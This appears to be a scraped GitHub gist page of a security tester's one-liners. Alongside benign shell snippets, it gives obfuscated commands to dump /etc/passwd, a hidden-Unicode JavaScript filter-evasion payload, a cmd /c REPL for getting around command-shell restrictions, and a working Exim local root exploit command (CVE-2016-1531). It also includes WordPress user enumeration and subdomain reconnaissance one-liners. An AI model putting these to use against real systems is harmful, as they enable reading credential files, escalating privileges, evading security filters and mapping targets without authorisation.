#Obfuscating calls to dump /etc/passwd
awk '1==1' </?t[Cc]/????wd
cd /etc;tr a a< p*wd
`sed 'ss:s|sg'
hook hook-s3c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| []["filter"]["constructor"](unescape(escape('󠅡󠅬󠅥').replace(/u.{8}/g,'')))() |
hook-s3c
/ frequency-analysis-one-liner.sh
Created
October 11, 2018 23:55
ciphertext word/symbol frequency analysis one-liner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat ciphertext.txt | tr ' ' '\n' | sort | uniq -c | awk '{print $1" "$2}' | column -c3 -s " " -t | sort -nr |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget -r -np -m -e robots=off --timeout=1 --tries=3 --retry-connrefused http://domain.tld |
hook-s3c
/ gist:8aadeb98587df63c8db3daa799a2633f
Created
August 31, 2018 12:41
run cmd interactively
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # thanks to - https://twitter.com/mwulftange/status/1034689855010353152 | |
| If you're not allowed to run cmd.exe interactively but `cmd /c …` works, this `cmd /c` based REPL may be helpful: | |
| cmd /c for /l %i in (0,0,1) do cmd /c "set /p C=^> & cmd /c %C%" |
hook-s3c
/ top20mostusedcommands.sh
Created
July 18, 2018 23:57
Top 20 most-used linux commands from bash history
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| history | awk '{CMD[$2]++;count++;}END { for (a in CMD)print CMD[a] " " CMD[a]/count*100 "% " a; }' | grep -v "./" | column -c3 -s " " -t | sort -nr | nl | head -n20 |
hook-s3c
/ bash_passwd_obfuscation.md
Created
June 15, 2018 15:06
Bash obfuscation /etc/passwd techniques
Using Exim < 4.86.2 Local Root Privilege Escalation Exploit (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531)
[user@server ~]$ whoami
admin
[user@server ~]$ id
uid=501(admin) gid=502(admin) groups=502(admin)
[user@server ~]$ PERL5OPT="-d/dev/null" /usr/sbin/exim -ps user@server
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| examplesite.com/wp-json/wp/v2/users |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Grab from crt.sh | |
| echo "targetdomain.com" | xargs -I testdomain curl -s "https://crt.sh/?q=%.testdomain&output=json" | jq '.name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | |
| # Grab from certspotter.com | |
| echo "targetdomain.com" | xargs -I testdomain curl -s https://certspotter.com/api/v0/certs\?domain\=testdomain | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | |
| # Enumerate hosts from SSL Certificate | |
| echo | openssl s_client -connect https://targetdomain.com:443 | openssl x509 -noout -text | grep DNS |
hook-s3c
/ net_utils.sh
Created
May 10, 2018 20:36
Quick utils / alias bash script for convenience when using nmap/airodump/mitmf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alias mygateway="print $(route -n | grep 'UG[ \t]' | awk '{print $2}')" | |
| alias myinterface="print $(route -n | grep 'UG[ \t]' | awk '{print $8}')" | |
| alias mysubnet="print $(ip -o -f inet addr show | awk '/scope global/ {print $4}')" |